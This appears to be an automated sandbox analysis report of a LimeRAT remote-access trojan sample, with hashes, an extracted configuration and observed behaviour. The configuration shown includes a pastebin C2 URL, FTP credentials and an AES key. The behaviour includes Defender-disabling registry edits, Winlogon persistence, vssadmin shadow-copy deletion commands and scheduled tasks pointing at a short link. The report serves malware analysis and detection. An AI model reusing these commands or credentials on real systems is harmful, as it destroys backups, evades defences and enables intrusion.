Analysis
-
max time kernel
1799s -
max time network
1803s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system -
submitted
26-04-2024 19:22
Behavioral task
behavioral1
Sample
Client.exe
Resource
win11-20240426-en
General
-
Target
Client.exe
-
Size
252KB
-
MD5
7746b64cfda991754c277e8dbfcb12bf
-
SHA1
f3d05a15cf7c4f1d07bca938076cb53df9c39e16
-
SHA256
ba34bf8ee0d74e9978464c7daa4c0f44cfeafbb2096364ee58432fd6ebbced91
-
SHA512
04b7a7dc507c150cc21217ba41a2f0cc7448f59e5b62e2f9279540a1cd2ed4b02b56d1d20ce901f09f6e347fb6e7208bfc08f1ecf814810af9ae05cf54327334
-
SSDEEP
6144:tEIE/UVPy/oCa+LDZWC9z589b2vknq1dis4N:iIzPygCa+DZQnq1cP
Malware Config
Extracted
Protocol: ftp- Host:
ftp.encompossoftware.com - Port:
21 - Username:
remoteuser - Password:
Encomposx99
Extracted
limerat
False
-
aes_key
adminsigma5214881939pashalko
-
antivm
false
-
c2_url
https://pastebin.com/raw/DDTVwwbu
-
download_payload
false
-
install
true
-
install_name
MIcrosoft Teams.exe
-
main_folder
True
-
payload_url
True
-
pin_spread
true
-
sub_folder
False
-
usb_spread
true
Signatures
-
Contains code to disable Windows Defender 2 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
Processes:
resource yara_rule behavioral1/memory/5068-0-0x0000024A54500000-0x0000024A54544000-memory.dmp disable_win_def behavioral1/files/0x0005000000025ccc-24.dat disable_win_def -
Modifies WinLogon for persistence 2 TTPs 2 IoCs
Processes:
Client.exeAdminMIcrosoft TeamsMIcrosoft Teams.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe,\"C:\\Users\\AdminMIcrosoft TeamsMIcrosoft Teams.exe\"" Client.exe Set value (str) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe,\"C:\\Users\\AdminMIcrosoft TeamsMIcrosoft Teams.exe\"" AdminMIcrosoft TeamsMIcrosoft Teams.exe -
Processes:
Client.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Client.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" Client.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" Client.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" Client.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
Client.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" Client.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Executes dropped EXE 1 IoCs
Processes:
AdminMIcrosoft TeamsMIcrosoft Teams.exepid Process 1716 AdminMIcrosoft TeamsMIcrosoft Teams.exe -
Enumerates connected drives 3 TTPs 15 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exedescription ioc Process File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
Processes:
flow ioc 10 pastebin.com 11 pastebin.com 12 pastebin.com 1 iplogger.org 1 pastebin.com 2 iplogger.org 4 pastebin.com 6 pastebin.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid Process 1372 schtasks.exe 3268 schtasks.exe 4952 schtasks.exe 2116 schtasks.exe 1240 schtasks.exe -
Disables Windows logging functionality 2 TTPs
Changes registry settings to disable Windows Event logging.
-
Interacts with shadow copies 2 TTPs 12 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exepid Process 3252 vssadmin.exe 3668 vssadmin.exe 896 vssadmin.exe 2280 vssadmin.exe 2580 vssadmin.exe 2076 vssadmin.exe 3308 vssadmin.exe 3036 vssadmin.exe 4024 vssadmin.exe 3928 vssadmin.exe 2272 vssadmin.exe 2444 vssadmin.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
Client.exepowershell.exeAdminMIcrosoft TeamsMIcrosoft Teams.exepid Process 5068 Client.exe 5068 Client.exe 5068 Client.exe 1300 powershell.exe 1300 powershell.exe 1716 AdminMIcrosoft TeamsMIcrosoft Teams.exe 1716 AdminMIcrosoft TeamsMIcrosoft Teams.exe 1716 AdminMIcrosoft TeamsMIcrosoft Teams.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes:
Client.exepowershell.exevssvc.exeAdminMIcrosoft TeamsMIcrosoft Teams.exedescription pid Process Token: SeDebugPrivilege 5068 Client.exe Token: SeDebugPrivilege 1300 powershell.exe Token: SeBackupPrivilege 3344 vssvc.exe Token: SeRestorePrivilege 3344 vssvc.exe Token: SeAuditPrivilege 3344 vssvc.exe Token: SeBackupPrivilege 5068 Client.exe Token: SeSecurityPrivilege 5068 Client.exe Token: SeBackupPrivilege 5068 Client.exe Token: SeDebugPrivilege 1716 AdminMIcrosoft TeamsMIcrosoft Teams.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Client.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid Process procid_target PID 5068 wrote to memory of 1300 5068 Client.exe 82 PID 5068 wrote to memory of 1300 5068 Client.exe 82 PID 5068 wrote to memory of 840 5068 Client.exe 84 PID 5068 wrote to memory of 840 5068 Client.exe 84 PID 5068 wrote to memory of 1408 5068 Client.exe 85 PID 5068 wrote to memory of 1408 5068 Client.exe 85 PID 5068 wrote to memory of 1184 5068 Client.exe 86 PID 5068 wrote to memory of 1184 5068 Client.exe 86 PID 5068 wrote to memory of 3568 5068 Client.exe 87 PID 5068 wrote to memory of 3568 5068 Client.exe 87 PID 5068 wrote to memory of 1552 5068 Client.exe 89 PID 5068 wrote to memory of 1552 5068 Client.exe 89 PID 5068 wrote to memory of 416 5068 Client.exe 90 PID 5068 wrote to memory of 416 5068 Client.exe 90 PID 5068 wrote to memory of 3132 5068 Client.exe 92 PID 5068 wrote to memory of 3132 5068 Client.exe 92 PID 5068 wrote to memory of 1912 5068 Client.exe 93 PID 5068 wrote to memory of 1912 5068 Client.exe 93 PID 5068 wrote to memory of 1820 5068 Client.exe 94 PID 5068 wrote to memory of 1820 5068 Client.exe 94 PID 5068 wrote to memory of 5112 5068 Client.exe 95 PID 5068 wrote to memory of 5112 5068 Client.exe 95 PID 5068 wrote to memory of 2760 5068 Client.exe 96 PID 5068 wrote to memory of 2760 5068 Client.exe 96 PID 5068 wrote to memory of 2860 5068 Client.exe 97 PID 5068 wrote to memory of 2860 5068 Client.exe 97 PID 5068 wrote to memory of 3408 5068 Client.exe 98 PID 5068 wrote to memory of 3408 5068 Client.exe 98 PID 840 wrote to memory of 3036 840 cmd.exe 110 PID 840 wrote to memory of 3036 840 cmd.exe 110 PID 1912 wrote to memory of 3252 1912 cmd.exe 112 PID 1912 wrote to memory of 3252 1912 cmd.exe 112 PID 1408 wrote to memory of 1692 1408 cmd.exe 113 PID 1408 wrote to memory of 1692 1408 cmd.exe 113 PID 5112 wrote to memory of 4024 5112 cmd.exe 114 PID 5112 wrote to memory of 4024 5112 cmd.exe 114 PID 2760 wrote to memory of 896 2760 cmd.exe 115 PID 2760 wrote to memory of 896 2760 cmd.exe 115 PID 3408 wrote to memory of 3668 3408 cmd.exe 116 PID 3408 wrote to memory of 3668 3408 cmd.exe 116 PID 416 wrote to memory of 2444 416 cmd.exe 118 PID 416 wrote to memory of 2444 416 cmd.exe 118 PID 1184 wrote to memory of 2272 1184 cmd.exe 119 PID 1184 wrote to memory of 2272 1184 cmd.exe 119 PID 3568 wrote to memory of 2076 3568 cmd.exe 120 PID 3568 wrote to memory of 2076 3568 cmd.exe 120 PID 1552 wrote to memory of 2280 1552 cmd.exe 121 PID 1552 wrote to memory of 2280 1552 cmd.exe 121 PID 3132 wrote to memory of 3928 3132 cmd.exe 122 PID 3132 wrote to memory of 3928 3132 cmd.exe 122 PID 1820 wrote to memory of 2580 1820 cmd.exe 123 PID 1820 wrote to memory of 2580 1820 cmd.exe 123 PID 2860 wrote to memory of 3308 2860 cmd.exe 124 PID 2860 wrote to memory of 3308 2860 cmd.exe 124 PID 5068 wrote to memory of 1372 5068 Client.exe 125 PID 5068 wrote to memory of 1372 5068 Client.exe 125 PID 5068 wrote to memory of 3268 5068 Client.exe 126 PID 5068 wrote to memory of 3268 5068 Client.exe 126 PID 5068 wrote to memory of 4952 5068 Client.exe 127 PID 5068 wrote to memory of 4952 5068 Client.exe 127 PID 5068 wrote to memory of 2116 5068 Client.exe 128 PID 5068 wrote to memory of 2116 5068 Client.exe 128 PID 5068 wrote to memory of 1240 5068 Client.exe 129 PID 5068 wrote to memory of 1240 5068 Client.exe 129 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Client.exe"C:\Users\Admin\AppData\Local\Temp\Client.exe"1⤵
- Modifies WinLogon for persistence
- Modifies Windows Defender Real-time Protection settings
- Modifies security service
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5068 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1300
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin Delete Shadows /all /quiet2⤵
- Suspicious use of WriteProcessMemory
PID:840 -
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:3036
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
PID:1408 -
C:\Windows\system32\vssadmin.exevssadmin resize shadow /for=c: /on=c: /maxsize=401MB3⤵PID:1692
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:1184 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:2272
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:3568 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2076
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
PID:1552 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2280
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:416 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2444
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
PID:3132 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3928
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:1912 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3252
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
PID:1820 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2580
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:5112 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4024
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:896
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:2860 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3308
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c Vssadmin delete shadowstorage /all /quiet2⤵
- Suspicious use of WriteProcessMemory
PID:3408 -
C:\Windows\system32\vssadmin.exeVssadmin delete shadowstorage /all /quiet3⤵
- Interacts with shadow copies
PID:3668
-
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /f /st "20:17" /sc daily /mo "3" /tn "Intel Platform Trust Technology" /tr "'explorer'http://bit.ly/2uTvEZn"2⤵
- Creates scheduled task(s)
PID:1372
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /f /st "18:29" /sc daily /mo "5" /tn "Intel Platform Trust Technology" /tr "'explorer'http://bit.ly/2uTvEZn"2⤵
- Creates scheduled task(s)
PID:3268
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /f /st "09:53" /sc daily /mo "1" /tn "Intel Platform Trust Technology" /tr "'explorer'http://bit.ly/2uTvEZn"2⤵
- Creates scheduled task(s)
PID:4952
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /f /st "13:02" /sc weekly /mo "3" /d "Sun" /tn "Intel Platform Trust Technology" /tr "'explorer'http://bit.ly/2uTvEZn"2⤵
- Creates scheduled task(s)
PID:2116
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /f /st "05:01" /sc monthly /m "may" /tn "Intel Platform Trust Technology" /tr "'explorer'http://bit.ly/2uTvEZn"2⤵
- Creates scheduled task(s)
PID:1240
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c ping 0 -n 2 & del "C:\Users\Admin\AppData\Local\Temp\Client.exe"2⤵PID:1852
-
C:\Windows\system32\PING.EXEping 0 -n 23⤵
- Runs ping.exe
PID:1080
-
-
-
C:\Users\AdminMIcrosoft TeamsMIcrosoft Teams.exe"C:\Users\AdminMIcrosoft TeamsMIcrosoft Teams.exe"2⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1716
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3344
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Defense Evasion
Impair Defenses
2Disable or Modify Tools
2Indicator Removal
2File Deletion
2Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
252KB
MD57746b64cfda991754c277e8dbfcb12bf
SHA1f3d05a15cf7c4f1d07bca938076cb53df9c39e16
SHA256ba34bf8ee0d74e9978464c7daa4c0f44cfeafbb2096364ee58432fd6ebbced91
SHA51204b7a7dc507c150cc21217ba41a2f0cc7448f59e5b62e2f9279540a1cd2ed4b02b56d1d20ce901f09f6e347fb6e7208bfc08f1ecf814810af9ae05cf54327334
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82